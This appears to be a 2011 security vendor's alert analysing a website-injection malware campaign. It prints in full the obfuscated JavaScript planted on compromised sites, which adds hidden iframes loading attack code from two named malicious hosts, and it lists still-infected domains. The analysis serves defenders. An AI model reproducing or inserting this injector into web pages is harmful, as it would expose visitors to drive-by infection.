• prw1.co.cc Malware Alert

    Malicious hackers are infecting websites in droves using a relatively new kind of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors.

    In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors. In this article we will show a new strain of malware that has already infected 43,000 websites.

    Identifying the Malware
    The specific piece of malware:

    y='rum';n='s';fp='afe';e='tp';bo='/f';lk='o.c';bl='742';x='7';i='ra';h='c';gf='.';fl='ht';q='//';w='c';pu='554';mk='p?';qg='tp=';il='ph';yy='o';am='5e';k='.c';c='me';u='r';d='20a';qd='1';z='prw';xu='if';iy='a';f=':';a=xu.concat(i,c);kx=n.concat(u,h);l=fl.concat(e,f,q,z,qd,k,lk,w,bo,yy,y,gf,il,mk,qg,bl,d,am,pu,fp,iy,x);var ov=document.createElement(a);ov.setAttribute('width','5');ov.setAttribute('height','5');ov.setAttribute('style','display:none');ov.setAttribute(kx,l);document.body.appendChild(ov);lb='r';r='d3b';q='.c';b='or';v='e';bi='e30';gl='?';j='c/f';ru='l';pj='a';zh='m.';h='a';xc='me';i='c';z='tp:';n='4';ye='=';lg='s';qk='426';jp='ht';g='a';k='z';ut='u';c='//p';pr='7f';o='i';by='fr';ck='3';pl='php';pe='tp';e='a';nc='.co';gz=o.concat(by,h,xc);kx=lg.concat(lb,i);dv=jp.concat(z,c,k,ru,ck,nc,q,j,b,ut,zh,pl,gl,pe,ye,v,pj,r,e,qk,pr,bi,g,n);var bo=document.createElement(gz);bo.setAttribute('width','5');bo.setAttribute('height','5');bo.setAttribute('style','display:none');bo.setAttribute(kx,dv);document.body.appendChild(bo);
    

    This malware adds an iframe to the infected webpage:

    iframe setAttribute src = http://prw1.co.cc/forum.php?tp=74220a5e554afea7
    

    The iframe points to two sites which are used to load the code used to infect the website visitor:

    pzl3.co.cc/forum.php?tp=ead3ba4267fe30a4
    prw1.co.cc/forum.php?tp=74220a5e554afea7
    

    Growth of Infected Sites
    The number of infected sites has grown significantly over the last few days. In less than a month, we have seen the number of sites more than double.

    Blacklist Services Not Reacting Quickly
    Current website reputation services have not yet started flagging sites with this specific malware. Many infected sites have not yet been blacklisted by Google Chrome, Firefox, Bing, Yahoo or other search engines and blacklist sources. Below we present a small sample of infected sites which have not yet been blacklisted, and will infect visitors upon visiting them.

    Infected sites that have not been blacklisted (As of April 23, 2011):

    www.kittyshomestore.com/
    muinvader.com/
    zirimi.com/
    ipcontext.com/
    www.bonitalions.org/
    www.sobragen.org.br/
    www.biostyle.ru/
    www.cnicanada.com/
    www.ceomanitoba.com/
    

    Anti-Virus Not Capable of Detecting the Infection
    Anti-virus engines are woefully inadequate at hunting down web-malware. We present screenshots to show the poor detection capabilities of Anti-virus engines with respect to this specific piece of malware. We see below that only 1 out of 41 AV engines were able to flag the malware.

    We Can Help!
    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.